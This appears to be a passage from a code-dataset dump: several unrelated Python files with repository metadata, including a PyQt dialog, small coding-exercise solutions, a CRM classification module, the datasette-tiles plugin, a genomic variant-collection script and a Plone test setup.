self.ui.dateDogoz.date().toString("yyyy-MM-dd"), "%Y-%m-%d").date(),
deviceRequestN=self.ui.editDevRequestN.text(),
deviceRequestCode=self.ui.editDevRequestCode.text(),
contractN=self.ui.editContractN.text(),
contractDate=datetime.datetime.strptime(
self.ui.dateContract.date().toString("yyyy-MM-dd"), "%Y-%m-%d").date(),
specReturnDate=datetime.datetime.strptime(
self.ui.dateSpecReturn.date().toString("yyyy-MM-dd"), "%Y-%m-%d").date(),
sum=int(self.ui.spinSum.value() * 100),
billNumber=self.ui.editBillN.text(),
billDate=datetime.datetime.strptime(self.ui.dateBill.date().toString("yyyy-MM-dd"),
"%Y-%m-%d").date(),
milDate=datetime.datetime.strptime(self.ui.dateMil.date().toString("yyyy-MM-dd"),
"%Y-%m-%d").date(),
addLetterDate=datetime.datetime.strptime(
self.ui.dateAddLetter.date().toString("yyyy-MM-dd"), "%Y-%m-%d").date(),
responseDate=datetime.datetime.strptime(
self.ui.dateResponse.date().toString("yyyy-MM-dd"), "%Y-%m-%d").date(),
paymentOrderN=self.ui.editPaymentN.text(),
paymentDate=datetime.datetime.strptime(
self.ui.datePayment.date().toString("yyyy-MM-dd"), "%Y-%m-%d").date(),
matPurchaseDate=datetime.datetime.strptime(
self.ui.dateMatPurchase.date().toString("yyyy-MM-dd"), "%Y-%m-%d").date(),
planShipmentDate=datetime.datetime.strptime(
self.ui.datePlanShip.date().toString("yyyy-MM-dd"), "%Y-%m-%d").date(),
shipmentPeriod=self.ui.spinShipPeriod.value(),
invoiceN=self.ui.editInvoiceN.text(),
invoiceDate=datetime.datetime.strptime(
self.ui.dateInvoice.date().toString("yyyy-MM-dd"), "%Y-%m-%d").date(),
packingListN=self.ui.editPacklistN.text(),
packingListDate=datetime.datetime.strptime(
self.ui.datePacklist.date().toString("yyyy-MM-dd"), "%Y-%m-%d").date(),
shipNote=self.ui.editShipNote.text(),
shipDate=datetime.datetime.strptime(self.ui.dateShip.date().toString("yyyy-MM-dd"),
"%Y-%m-%d").date(),
completed=completed,
contacts=self.ui.textContact.toPlainText(),
manufPlanDate=datetime.datetime.strptime(
self.ui.dateManufPlan.date().toString("yyyy-MM-dd"), "%Y-%m-%d"))
self._productList = self._productModel.getProductList()
def getData(self):
return self.newItem, self._productList
def onBtnOkClicked(self):
if not self.verifyInputData():
return
self.collectData()
self.accept()
def onBtnClientAddClicked(self):
self._uiFacade.requestClientAdd(caller=self)
def onBtnProductAddClicked(self):
self._productModel.addProduct(self._domainModel.dicts[const.DICT_PRODUCT].getIdByIndex(1))
def onBtnProductRemoveClicked(self):
if not self.ui.tableProduct.selectionModel().hasSelection():
return
result = QMessageBox.question(self.parent(), "Внимание!",
"Вы хотите удалить выбранную запись?")
if result != QMessageBox.Yes:
return
self._productModel.removeProduct(self.ui.tableProduct.selectionModel().selectedIndexes()[0].row())
def onBtnNewProductClicked(self):
self._uiFacade.requestProductAdd(caller=self)
| [
"[email protected]"
] | |
5ed9622704f875d95003d08b1e22ecbfb53984cd | 99ca151c59afd9c0e7091b6919768448e40f88a2 | /numpy_and_math_error.py | ae3f097ca8ea71aad9e01311276bd6f306b6dfdb | [] | no_license | zainabnazari/Python_note | 1b6a454f6e7b3aca998d87a201823a600ec28815 | 3beb52beb3a0ebe17a6ac8c5695670e9dde59269 | refs/heads/main | 2023-02-10T22:32:33.160428 | 2021-01-12T18:36:54 | 2021-01-12T18:36:54 | 304,724,221 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 344 | py | #file name: numpy_and_math_error.py
import numpy as np
import math
myarray = np.array([1,2,3])
root = math.sqrt(myarray)
print(root)
"""
Output:
Traceback (most recent call last):
File "numpy_and_math_error.py", line 5, in <module>
root = math.sqrt(myarray)
TypeError: only size-1 arrays can be converted to Python scalars
""" | [
"[email protected]"
] | |
06c1581193edfd27f19dd85b4d1d96492fe96651 | eea1c66c80784d4aefeb0d5fd2e186f9a3b1ac6e | /atcoder/abc/abc001-100/abc050/a.py | aee99db3e562045ac30ac7a75beb5b1f24ddaa49 | [] | no_license | reo11/AtCoder | 4e99d6f40d8befe264761e3b8c33d3a6b7ba0fe9 | 69c6d67f05cb9190d8fb07204488cd7ce4d0bed2 | refs/heads/master | 2023-08-28T10:54:50.859288 | 2023-08-22T18:52:47 | 2023-08-22T18:52:47 | 162,085,118 | 4 | 0 | null | 2023-07-01T14:17:28 | 2018-12-17T06:31:10 | Python | UTF-8 | Python | false | false | 114 | py | a, op, b = map(str, input().split())
a = int(a)
b = int(b)
if op == "+":
print(a + b)
else:
print(a - b)
| [
"[email protected]"
] | |
dd9947fc7776c6931faffc56c6329f2422b0f5d0 | 04a77043cebd9415069aad4a6b8e7af077de1168 | /1-pbase/day11/exmple/filter.py | c8a7fa97539cd633362bc8a071f7fe9afc4d4bc4 | [] | no_license | yangxiangtao/biji | a935fbc4af42c81205900cb95a11e98c16d739de | 5c5f46e6c145fc02ea10b7befdc05c489fc3b945 | refs/heads/master | 2022-11-12T02:25:51.532838 | 2019-04-02T01:22:12 | 2019-04-02T01:22:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 204 | py | # def is_odd(x):
# return x%2==1
# for x in filter(is_odd,range(20)):
# print(x)
# for x in filter(lambda x:x%2==1,range(10)):
# print(x)
L=list(filter(lambda x: x%2==1,range(10)))
print(L) | [
"[email protected]"
] | |
a8bedaa690e6167e7b41d66bab84ec2b45aa2730 | a7b592be95dc2af9fdb56725f44e98cc59166e6f | /apps/ncrm/classify_tree/__init__.py | 1bdb2878103c34846ea3bb162078fbd95ea785dd | [] | no_license | cash2one/CRM-3 | bc864c462d155b5dc6a51a5edbd564574b3e2f94 | cedcaeb397ccadb36952534242bd296c5b4513bb | refs/heads/master | 2021-06-14T07:40:53.572013 | 2017-05-23T15:52:06 | 2017-05-23T15:52:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,249 | py | # coding=UTF-8
import itertools, datetime
from bson.objectid import ObjectId
from apps.ncrm.models import TreeTemplate, PlanTree, pt_coll, ptr_coll, Customer
from apps.common.biz_utils.utils_cacheadapter import CrmCacheAdapter
from apps.common.utils.utils_log import log
from .field import FieldManager
from .node import TreeNode
from .parser import TreePasser
__all__ = ["build_tree", "read_tree_branch"]
class CustomerLoader(object):
def __init__(self):
pass
def loading(self, load_fields, customer_mapping):
load_funcs = set(itertools.chain(*[ field.load_func for field in load_fields ]))
for load_func in load_funcs:
if callable(load_func):
load_func(customer_mapping)
for customer in customer_mapping.values():
for field in load_fields:
if callable(field.custom_func):
field_result = field.custom_func(customer)
setattr(customer, field.name, field_result)
# if getattr(customer, field.name) :
# print "{} : {} - {}".format(customer.shop_id, field.name, getattr(customer, field.name))
return customer_mapping
class Classifier(object):
def __init__(self, parser_cls, loader_cls, node_container):
self.parser = parser_cls
self.node_container = node_container
self.loader = loader_cls
self.cache_backend = CrmCacheAdapter()
self.timeout = 60 * 60 * 30
def load_customers_bypath(self, path, psuser):
tree_id = path.split("_", 1)[0]
if tree_id.isdigit():
cache_key = "{}_{}".format(psuser.id, path)
shop_id_list = self.cache_backend.get(cache_key)
if shop_id_list is None:
tree_template = TreeTemplate.get_tree_byid(int(tree_id))
self(tree_template, psuser)
shop_id_list = self.cache_backend.get(path) or []
else:
shop_id_list = self.get_plan_tree_shops(path)
return shop_id_list
def get_plan_tree_shops(self, path):
def get_child_data_list(node_data, key, result_list):
if node_data['child_list']:
for child in node_data['child_list']:
get_child_data_list(child, key, result_list)
else:
value = node_data[key]
if type(value) is list:
result_list.extend(node_data[key])
else:
result_list.append(value)
return result_list
node_path_list = path.split("_")
node_data = PlanTree.get_tree_byid(node_path_list[0])
for i in node_path_list[1:]:
node_data = node_data['child_list'][int(i)]
shop_id_list = list(set(get_child_data_list(node_data, 'shop_id_list', [])))
return shop_id_list
# def get_path_by_shop_id(self, shop_id, tree_template):
# path = None
# customer_mapping = {customer.shop_id:customer for customer in Customer.objects.filter(shop_id=shop_id)}
# if customer_mapping:
	# # Load and parse the tree
# fields_mapping = FieldManager.read_allfields_mapping()
# parser = self.parser(tree_template, self.node_container, fields_mapping)
#
	# # Attach the data used for the computation
# self.loader().loading(parser.related_fields, customer_mapping)
#
# tree_data = parser.hungon_people_counter(customer_mapping)
# path_list = [_path for _path, shop_id_list in tree_data.items() if shop_id in shop_id_list]
# path_list.append(str(tree_template.id))
# path_list.sort()
# path = path_list[-1]
#
# return path
def get_path_by_shop_id(self, shop_id, tree_data):
path = None
if shop_id in tree_data.get('shop_id_list', []):
path = tree_data.get('path')
else:
for child_data in tree_data.get('child_list', []):
path = self.get_path_by_shop_id(shop_id, child_data)
if path:
break
return path
def get_or_create_path_by_shop_id(self, shop_id, tree_id, tree_data):
path = self.get_path_by_shop_id(shop_id, tree_data)
if not path:
if tree_data['child_list']:
rest_node_list = filter(lambda x: not x['cond_list'], tree_data['child_list'])
if rest_node_list:
path = rest_node_list[0]['path']
rest_node_list[0]['shop_id_list'].append(shop_id)
rest_node_list[0]['shop_count'] = len(rest_node_list[0]['shop_id_list'])
else:
path = '%s_%s'% (tree_data['path'], len(tree_data['child_list']))
tree_data['child_list'].append({
'name': '其他',
'desc': '',
'goal': {},
'child_list': [],
'cond_list': [],
'path': path,
'shop_count': 1,
'shop_id_list': [shop_id]
})
else:
path = tree_data['path']
tree_data['shop_id_list'].append(shop_id)
tree_data['shop_count'] += 1
PlanTree.update_tree(tree_id, tree_data)
return path
def load_plan_tree_record(self, tree_id, start_time, tree_data):
rec_dict = {}
def load_data(tree_data):
tree_data.update({'record':{k: 0 for k, _ in PlanTree.GOAL_KEY_CHOICES}})
if tree_data['child_list']:
for child_data in tree_data['child_list']:
load_data(child_data)
for k in tree_data['record']:
tree_data['record'][k] += child_data['record'][k]
else:
for k in tree_data['record']:
if tree_data['path'] in rec_dict:
tree_data['record'][k] = rec_dict[tree_data['path']].get(k, 0)
pipeline = [
{
'$match':{
'tree_id': ObjectId(tree_id),
'create_time': {
'$gte': start_time,
}
}
},
{
'$group':{
'_id': {
'path': '$path',
'rec_type': '$rec_type'
},
'rec_value': {'$sum': '$rec_value'}
}
},
{
'$project':{
'_id': 0,
'path': '$_id.path',
'rec_type': '$_id.rec_type',
'rec_value': 1
}
}
]
rec_list = ptr_coll.aggregate(pipeline)['result']
for rec in rec_list:
rec_dict.setdefault(rec['path'], {})[rec['rec_type']] = rec['rec_value']
load_data(tree_data)
def auto_insert_record(self, psuser, shop_id, nick, rec_type, rec_value, create_time):
try:
plan_tree = list(pt_coll.find({
'psuser_id': psuser.id,
'status': 1,
'start_time':{'$lte':create_time},
'end_time':{'$gt':create_time - datetime.timedelta(days=1)}
}))
if plan_tree:
plan_tree = plan_tree[0]
# tree_obj = PlanTree.get_tree_template(plan_tree)
# path = self.get_path_by_shop_id(shop_id, tree_obj)
path = self.get_or_create_path_by_shop_id(shop_id, plan_tree['_id'], plan_tree)
if path:
ptr_coll.insert({
'tree_id': plan_tree['_id'],
'path': path,
'shop_id': shop_id,
'nick': nick,
'rec_type': rec_type,
'rec_value': rec_value,
'psuser_id': 0,
'psuser_cn': '系统',
'create_time': create_time
})
except Exception, e:
log.error('build_tree.auto_insert_record error, e=%s' % e)
def __call__(self, tree_template, psuser, is_stat = True, cat_id_list = None, plan_stat = False):
		# Initialise the user's customer-data mapping
if cat_id_list:
customer_mapping = {customer.shop_id:customer for customer in psuser.mycustomers_withcat if customer.cat_id in cat_id_list}
else:
customer_mapping = {customer.shop_id:customer for customer in psuser.mycustomers}
		# Load and parse the tree
fields_mapping = FieldManager.read_allfields_mapping()
parser = self.parser(tree_template, self.node_container, fields_mapping)
if is_stat:
			# Attach the data used for the computation
			self.loader().loading(parser.related_fields, customer_mapping)
			# Compute the per-node shop lists and cache them
			cache_result = parser.hungon_people_counter(customer_mapping)
			cache_result = {'{}_{}'.format(psuser.id, key):val for key, val in cache_result.items()}
			self.cache_backend.set_many(cache_result, self.timeout) # write to cache
		# Parse the tree back out to JSON
tree_data = parser.parser_to_json()
if plan_stat:
			# Aggregate goal-tracking records for the plan tree
self.load_plan_tree_record(tree_template.id, tree_template.start_time, tree_data)
return tree_data
def refresh_plan_tree(self, tree_id, tree_data, psuser):
try:
tree_doc = PlanTree.get_tree_byid(tree_id)
tree_doc.update(tree_data)
tree_obj = PlanTree.get_tree_template(tree_doc)
tree_doc = self(tree_obj, psuser)
tree_doc.update(tree_data)
PlanTree.update_tree(tree_id, tree_doc)
except Exception, e:
print 'build_tree.refresh_plan_tree error, tree_id=%s, e=%s' % (tree_id, e)
build_tree = Classifier(TreePasser, CustomerLoader, TreeNode)
read_tree_branch = build_tree.load_customers_bypath
load_all_fields = FieldManager.read_all_fields | [
"[email protected]"
] | |
0ba46ca25f7954a614e976605f8cede03101b4ed | 1356c64ee93435b3d312c8abbf0cfbdf28935645 | /2565_electric_flex_20191212.py | 3984d15a3a4e99cec8677dff6cf213d5e661f827 | [] | no_license | tmtmaj/algorithm_2019_12_03 | 48829c6c03fa1b4528fc161056303c30eab1a31a | bf86bd36a044978fa3a60b65a7a248de2a2052ac | refs/heads/master | 2021-06-25T05:07:42.726320 | 2021-05-08T14:20:02 | 2021-05-08T14:20:02 | 225,642,301 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,501 | py | # import sys
# cmd = lambda: sys.stdin.readline()
#
# def x_func(e_list):
# e_list = e_list
# x_list = [0 for _ in range(len(e_list))]
#
# for i in range(len(e_list)):
# for j in range(i + 1, len(e_list)):
# if (e_list[i][0] > e_list[j][0] and e_list[i][1] < e_list[j][1]) or (e_list[i][0] < e_list[j][0] and e_list[i][1] > e_list[j][1]):
# x_list[i] += 1
# x_list[j] += 1
#
# return x_list
#
#
# N = int(cmd().strip())
# e_list = []
# cnt = 0
#
# for _ in range(N):
# e_list.append(list(map(int, cmd().strip().split())))
#
# x_list = [0 for _ in range(N)]
#
# # print(e_list)
# for i in range(N):
# for j in range(i+1, N):
# if (e_list[i][0] > e_list[j][0] and e_list[i][1] < e_list[j][1]) or (e_list[i][0] < e_list[j][0] and e_list[i][1] > e_list[j][1]):
# x_list[i] += 1
# x_list[j] += 1
#
# # print(x_list)
#
# while max(x_list) != 0:
# max_x = max(x_list)
# max_x_index = x_list.index(max_x)
# del e_list[max_x_index]
# x_list = x_func(e_list)
# cnt += 1
# print(x_list)
# print(e_list)
#
# print(cnt)
import sys
cmd = lambda: sys.stdin.readline()
N = int(cmd().strip())
e_list = [list(map(int, cmd().strip().split())) for _ in range(N)]
e_list.sort(key = lambda x: x[0])
lis = [1]
for i in range(1, N):
lis.append(1)
for j in range(i):
if e_list[i][1] > e_list[j][1] and lis[j] + 1 > lis[i]:
lis[i] = lis[j] + 1
print(N - max(lis)) | [
"[email protected]"
] | |
48c0e9e27a52eafca750b8ee40a439230b894fcf | 116aadef9866be33782c6cbd06901703728295cc | /datasette_tiles/__init__.py | f8a2f4b9cec6f2c18358bdf5ac7b743a850c6d3f | [
"Apache-2.0"
] | permissive | dracos/datasette-tiles | 9c4cf6ca683a703f08e1f69cbc4def3694d7bcc3 | f7aa1a49df23584445cf154ad0e3e6d750965b15 | refs/heads/main | 2023-02-28T22:33:08.331682 | 2021-02-03T22:21:57 | 2021-02-03T22:21:57 | 335,932,265 | 0 | 0 | null | 2021-02-04T11:24:40 | 2021-02-04T11:24:39 | null | UTF-8 | Python | false | false | 6,641 | py | from datasette import hookimpl
from datasette.utils.asgi import Response, NotFound
from datasette_tiles.utils import detect_mtiles_databases, tiles_stack_database_order
import json
# 256x256 PNG of colour #dddddd, compressed using https://squoosh.app
PNG_404 = (
b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x01\x00\x00\x00\x01\x00\x04\x00\x00"
b"\x00\x00\xbc\xe9\x1a\xbb\x00\x00\x00\x9cIDATx\xda\xed\xce1\x01\x00\x00\x0c\x02"
b"\xa0\xd9?\xe3\xba\x18\xc3\x07\x12\x90\xbf\xad\x08\x08\x08\x08\x08\x08\x08\x08"
b"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08"
b"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08"
b"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08"
b"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08"
b"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08"
b"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\xac"
b"\x03\x05\xddg\xde\x01\xd26\xe7\xdd\x00\x00\x00\x00IEND\xaeB`\x82"
)
SELECT_TILE_SQL = """
select
tile_data
from
tiles
where
zoom_level = :z
and tile_column = :x
and tile_row = :y
""".strip()
@hookimpl
def register_routes():
return [
(r"/-/tiles$", index),
(r"/-/tiles/(?P<db_name>[^/]+)$", explorer),
(r"/-/tiles/(?P<db_name>[^/]+)/(?P<z>\d+)/(?P<x>\d+)/(?P<y>\d+)\.png$", tile),
(r"/-/tiles-stack$", tiles_stack_explorer),
(r"/-/tiles-stack/(?P<z>\d+)/(?P<x>\d+)/(?P<y>\d+)\.png$", tiles_stack),
]
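# Illustrative URL shapes served by the routes above (values are examples only):
#   /-/tiles                         -> index
#   /-/tiles/mydb                    -> explorer
#   /-/tiles/mydb/12/656/1582.png    -> tile
#   /-/tiles-stack/12/656/1582.png   -> tiles_stack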
async def index(datasette):
return Response.html(
await datasette.render_template(
"tiles_index.html",
{"mbtiles_databases": await detect_mtiles_databases(datasette)},
)
)
async def load_tile(db, request):
z = request.url_vars["z"]
x = request.url_vars["x"]
y = request.url_vars["y"]
result = await db.execute(
SELECT_TILE_SQL,
{
"z": z,
"x": x,
"y": y,
},
)
if not result.rows:
return None
return result.rows[0][0]
async def tile(request, datasette):
db_name = request.url_vars["db_name"]
mbtiles_databases = await detect_mtiles_databases(datasette)
if db_name not in mbtiles_databases:
raise NotFound("Not a valid mbtiles database")
db = datasette.get_database(db_name)
tile = await load_tile(db, request)
if tile is None:
return Response(body=PNG_404, content_type="image/png", status=404)
return Response(body=tile, content_type="image/png")
async def tiles_stack(datasette, request):
priority_order = await tiles_stack_database_order(datasette)
# Try each database in turn
for database in priority_order:
tile = await load_tile(database, request)
if tile is not None:
return Response(body=tile, content_type="image/png")
return Response(body=PNG_404, content_type="image/png", status=404)
async def explorer(datasette, request):
db_name = request.url_vars["db_name"]
mbtiles_databases = await detect_mtiles_databases(datasette)
if db_name not in mbtiles_databases:
raise NotFound("Not a valid mbtiles database")
db = datasette.get_database(db_name)
metadata = {
row["name"]: row["value"]
for row in (await db.execute("select name, value from metadata")).rows
}
default_latitude = 0
default_longitude = 0
default_zoom = 0
if metadata.get("center") and len(metadata["center"].split(",")) == 3:
default_longitude, default_latitude, default_zoom = metadata["center"].split(
","
)
min_zoom = 0
max_zoom = 19
if metadata.get("minzoom"):
min_zoom = metadata["minzoom"]
if metadata.get("maxzoom"):
max_zoom = metadata["maxzoom"]
attribution = metadata.get("attribution") or None
return Response.html(
await datasette.render_template(
"tiles_explorer.html",
{
"metadata": metadata,
"db_name": db_name,
"db_path": datasette.urls.database(db_name),
"default_latitude": default_latitude,
"default_longitude": default_longitude,
"default_zoom": default_zoom,
"min_zoom": min_zoom,
"max_zoom": max_zoom,
"attribution": json.dumps(attribution),
},
)
)
async def tiles_stack_explorer(datasette):
attribution = ""
# Find min/max zoom by looking at the stack
priority_order = await tiles_stack_database_order(datasette)
min_zooms = []
max_zooms = []
attributions = []
for db in priority_order:
metadata = {
row["name"]: row["value"]
for row in (await db.execute("select name, value from metadata")).rows
}
if "minzoom" in metadata:
min_zooms.append(int(metadata["minzoom"]))
if "maxzoom" in metadata:
max_zooms.append(int(metadata["maxzoom"]))
# If all attributions are the same, use that - otherwise leave blank
if len(set(attributions)) == 1:
attribution = attributions[0]
min_zoom = min(min_zooms)
max_zoom = max(max_zooms)
return Response.html(
await datasette.render_template(
"tiles_stack_explorer.html",
{
"default_latitude": 0,
"default_longitude": 0,
"default_zoom": min_zoom,
"min_zoom": min_zoom,
"max_zoom": max_zoom,
"attribution": json.dumps(attribution),
},
)
)
@hookimpl
def database_actions(datasette, database):
async def inner():
mbtiles_databases = await detect_mtiles_databases(datasette)
if database in mbtiles_databases:
return [
{
"href": datasette.urls.path("/-/tiles/{}".format(database)),
"label": "Explore these tiles on a map",
}
]
return inner
@hookimpl
def table_actions(datasette, database, table):
async def inner():
if table != "tiles":
return None
mbtiles_databases = await detect_mtiles_databases(datasette)
if database in mbtiles_databases:
return [
{
"href": datasette.urls.path("/-/tiles/{}".format(database)),
"label": "Explore these tiles on a map",
}
]
return inner
| [
"[email protected]"
] | |
38ae0d1a558d1e120aea23f100feba10b508b6d0 | 5789f30bc942dde4235668c56408575b0bd25599 | /variantBase/variantList/collect_run_variants_to_variantlist.py | 62ac9d99d2ae82a73481e7879aa4aacca561689e | [] | no_license | bioinfo-chu-bdx/ngs-somatic | bc9dfa60872a644f18650593d144726d0ab22767 | 8cc6411e16784f2891b92241a97c71788408ffb5 | refs/heads/master | 2023-04-25T19:48:52.073672 | 2021-03-19T14:21:49 | 2021-03-19T14:21:49 | 374,675,975 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,329 | py | #!/usr/bin/python
import sys
import re
import json
import xlrd
import glob
import os
import openpyxl
# THIS SCRIPT UPDATES THE COMPLETE VariantList_ALL.json FROM A RUN LIST OR A SINGLE RUN FOLDER GIVEN IN ARGV.
# VARIANTLIST JSON CONTAINS RunName, Sample, Variant Data (chrm, start, stop, ref, alt, varcov, poscov). EXAMPLE :
#"Auto_user_PGM-165-Run98_35pM_Chef_SBT_colon_lung_v4_318v2_234": {
#"SAMPLE-AF454G": [
#["chr4", 55599436, 55599436, "T", "C", 405, 1245],
#["chr7", 55599438, 55599438, "G", "C", 120, 1040],
# ]
# USAGE : python collect_run_variants_to_variantlist.py
# OR : python collect_run_variants_to_variantlist.py /path/to/run_folder
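# Example (sketch) of consuming the generated JSON afterwards:
#   with open('variantList_ALL.json') as f:
#       variantlist = json.load(f)
#   for run, samples in variantlist.items():
#       for sample, variants in samples.items():
#           pass  # each variant is [chrm, start, stop, ref, alt, varcov, poscov]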
pipeline_folder = os.environ['NGS_PIPELINE_BX_DIR']
variant_list_path = '%s/variantBase/variantList/variantList_ALL.json' % pipeline_folder
run_list_path = '%s/variantBase/runList/runList_ALL.fullpath.txt' % pipeline_folder
variantlist = {}
if os.path.exists(variant_list_path):
with open(variant_list_path, 'r') as g:
variantlist = json.load(g)
run2write_ordered = []
if len(sys.argv)>1:
run_list = [sys.argv[1]]
else:
run_list = []
rl = open(run_list_path,'r')
for run in rl:
run_folder = run.replace('\n','')
run_list.append(run_folder)
for run_folder in run_list:
# RUN TABLE
if run_folder.endswith('/'):
run = run_folder.split('/')[-2]
else:
run = run_folder.split('/')[-1]
run2write_ordered.append(run)
barcodes_json = False
with open(run_folder+'/barcodes.json', 'r') as g:
barcodes_json = json.load(g)
if run not in variantlist:
variantlist[run] = {}
else:
print "*already in variantlist* %s" % run
continue
print "- collecting %s ..." % run
for barcode in barcodes_json:
sample = barcodes_json[barcode]['sample']
dna_number = barcodes_json[barcode]['sample_id']
#if dna_number == 'CONTROL':
#continue
if sample not in variantlist[run]:
variantlist[run][sample] = []
finalreport_paths = glob.glob('%s/%s/*%s_%s*finalReport*'%(run_folder,sample,sample,barcode))
if finalreport_paths:
for fp_path in finalreport_paths:
				if '~$' in fp_path: # temporary Office lock file
continue
if fp_path.endswith('.xls'):
#xlrd
fp = xlrd.open_workbook(fp_path)
anno_sheet = fp.sheet_by_index(0)
for j in range(anno_sheet.ncols):
if anno_sheet.cell_value(0,j) in ['Chr','chr','Chromosome','chromosome','chrom','Chrom']:
chromosome_index = j
elif anno_sheet.cell_value(0,j) in ['Start_Position','Position','Start.Pos','Start.Pos.','Start','start','Position','Pos.']:
start_index = j
elif anno_sheet.cell_value(0,j) in ['Ref.seq','Ref.Seq','Ref.seq.','Ref.Seq.','Ref','ref']:
ref_index = j
elif anno_sheet.cell_value(0,j) in ['Var.seq','Var.Seq','Alt','Var.seq.','Var.Seq.','alt']:
alt_index = j
elif anno_sheet.cell_value(0,j) in ['Var.Cov.','var.cov.']:
varcov_index = j
elif anno_sheet.cell_value(0,j) in ['Pos.Cov.','Depth']:
poscov_index = j
### PARSE XLS
for i in range(1,anno_sheet.nrows):
chrm = anno_sheet.cell_value(i,chromosome_index)
ref = anno_sheet.cell_value(i,ref_index)
alt = anno_sheet.cell_value(i,alt_index)
if chrm and ref and alt :
start = int(anno_sheet.cell_value(i,start_index))
varcov = int(anno_sheet.cell_value(i,varcov_index))
poscov = int(anno_sheet.cell_value(i,poscov_index))
if ref == '-':
stop = start + 1
elif alt == '-':
if len(ref) > 1:
stop = start+(len(ref)-1)
else:
stop = start
elif len(ref) > 1 or len(alt) > 1:
if len(ref) > 1:
stop = start+(len(ref)-1)
else:
stop = start
else:
stop = start
variant = [str(chrm),start,stop,str(ref),str(alt),varcov,poscov]
if variant not in variantlist[run][sample]:
variantlist[run][sample].append(variant)
elif fp_path.endswith('.xlsx'):
#openpyxl
fp = openpyxl.load_workbook(fp_path)
anno_sheetname = fp.sheetnames[0]
anno_sheet = fp[anno_sheetname]
for ncol in range(anno_sheet.max_column):
if anno_sheet.cell(row=1,column=ncol+1).value in ['Chr','chr','Chromosome','chromosome','chrom','Chrom']:
chromosome_index = ncol+1
elif anno_sheet.cell(row=1,column=ncol+1).value in ['Start_Position','Position','Start.Pos','Start.Pos.','Start','start','Position','Pos.']:
start_index = ncol+1
elif anno_sheet.cell(row=1,column=ncol+1).value in ['Ref.seq','Ref.Seq','Ref.seq.','Ref.Seq.','Ref','ref']:
ref_index = ncol+1
elif anno_sheet.cell(row=1,column=ncol+1).value in ['Var.seq','Var.Seq','Alt','Var.seq.','Var.Seq.','alt']:
alt_index = ncol+1
if anno_sheet.cell(row=1,column=ncol+1).value in ['Var.Cov.','var.cov.']:
varcov_index = ncol+1
if anno_sheet.cell(row=1,column=ncol+1).value in ['Pos.Cov.','Depth']:
poscov_index = ncol+1
### PARSE XLSX
for nrow in range(2,anno_sheet.max_row+1):
chrm = anno_sheet.cell(row=nrow,column=chromosome_index).value
ref = anno_sheet.cell(row=nrow,column=ref_index).value
alt = anno_sheet.cell(row=nrow,column=alt_index).value
if chrm and ref and alt :
start = int(anno_sheet.cell(row=nrow,column=start_index).value)
varcov = int(anno_sheet.cell(row=nrow,column=varcov_index).value)
poscov = int(anno_sheet.cell(row=nrow,column=poscov_index).value)
if ref == '-':
stop = start + 1
elif alt == '-':
if len(ref) > 1:
stop = start+(len(ref)-1)
else:
stop = start
elif len(ref) > 1 or len(alt) > 1:
if len(ref) > 1:
stop = start+(len(ref)-1)
else:
stop = start
else:
stop = start
variant = [str(chrm),start,stop,str(ref),str(alt),varcov,poscov]
if variant not in variantlist[run][sample]:
variantlist[run][sample].append(variant)
else:
print "**WARNING (FINALREPORT FILE EXTENSION weird )** %s" % fp_path
#print "\t- %s : %s variants" % (sample,len(variantlist[run][sample]))
else:
print "**WARNING (NO FINALREPORT found for SAMPLE )** %s" % sample
print "- WRITING VARIANTLIST JSON..."
# custom writing routine: unlike json.dumps(indent=...), which spreads the output over far too many lines
with open(variant_list_path,'w') as vljson:
vljson.write('{\n')
for i in range(len(run2write_ordered)) :
run = run2write_ordered[i]
vljson.write('\t"%s": {\n' % run)
for j in range(len(variantlist[run].keys())):
sample = variantlist[run].keys()[j]
vljson.write('\t\t"%s": [\n' % (sample))
for k in range(len(variantlist[run][sample])):
variant = str(variantlist[run][sample][k]).replace('\'','"').replace('u"','"')
if k == (len(variantlist[run][sample])-1):
vljson.write('\t\t\t%s\n' % variant)
else:
vljson.write('\t\t\t%s,\n' % variant)
if j == (len(variantlist[run].keys())-1):
vljson.write('\t\t]\n')
else:
vljson.write('\t\t],\n')
if i == (len(run2write_ordered)-1):
vljson.write('\t}\n')
else:
vljson.write('\t},\n')
vljson.write('}\n')
| [
"[email protected]"
] | |
f4ed06e7ea8b347da25f534ba02242feff4c32b1 | 0e878d60050d3e34f33ab3f1bbfc0a0551e421d9 | /fui/fsbrowse/tests/base.py | 998b0711d09a90a7b2461a7454bea1d2aacf71dc | [] | no_license | espenak/fui.fsbrowse | bca49b7a82ffcad8e984490ed486d7038062ae8c | ba2ddd37f2fde9b0189336f50c995849de25ac45 | refs/heads/master | 2021-01-20T09:41:17.205327 | 2009-11-06T12:48:51 | 2009-11-06T12:48:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,062 | py | from Products.Five import zcml
from Products.Five import fiveconfigure
from Testing import ZopeTestCase as ztc
from Products.PloneTestCase import PloneTestCase as ptc
from Products.PloneTestCase.layer import onsetup
from Products.Five.testbrowser import Browser
from zope.component import getUtility, getMultiAdapter
from plone.portlets.interfaces import IPortletManager
from plone.portlets.interfaces import IPortletAssignmentMapping
from Products.PloneTestCase.setup import portal_owner, default_password
@onsetup
def setup_fui_fsbrowse():
"""Set up the additional products required for the fui.fsbrowse product.
The @onsetup decorator causes the execution of this body to be deferred
until the setup of the Plone site testing layer.
"""
    # Load the ZCML configuration for the fui.fsbrowse package.
    # This includes the other products below as well.
fiveconfigure.debug_mode = True
import fui.fsbrowse
zcml.load_config('configure.zcml', fui.fsbrowse)
fiveconfigure.debug_mode = False
# We need to tell the testing framework that these products
# should be available. This can't happen until after we have loaded
